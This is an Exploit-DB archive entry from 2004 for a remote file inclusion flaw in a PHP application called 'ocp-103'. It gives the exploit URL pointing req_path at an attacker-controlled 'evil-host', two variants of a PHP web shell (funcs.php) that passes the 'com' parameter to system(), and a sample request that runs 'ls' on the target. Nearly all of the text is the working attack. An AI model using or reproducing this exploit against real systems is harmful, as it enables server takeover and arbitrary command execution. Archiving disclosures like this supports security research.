exploit-db-mirror/exploits/php/webapps/574.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

36 lines
No EOL
473 B
Text

http://localhost/ocp-103/index.php?req_path=http ://evil-host/
On your evil host you must put scipt funcs.php.
Example of funcs.php if your host doesn't support php.
<?php
$com = $_GET["com"];
system ("$com");
?>
Example of funcs.php if your host support php.
<?php
echo '<?php $com = $_GET["com"]; system ("$com"); ?>';
?>
http://localhost/ocp-103/index.php?req_path=http://evil-host/&com=ls
# milw0rm.com [2004-10-13]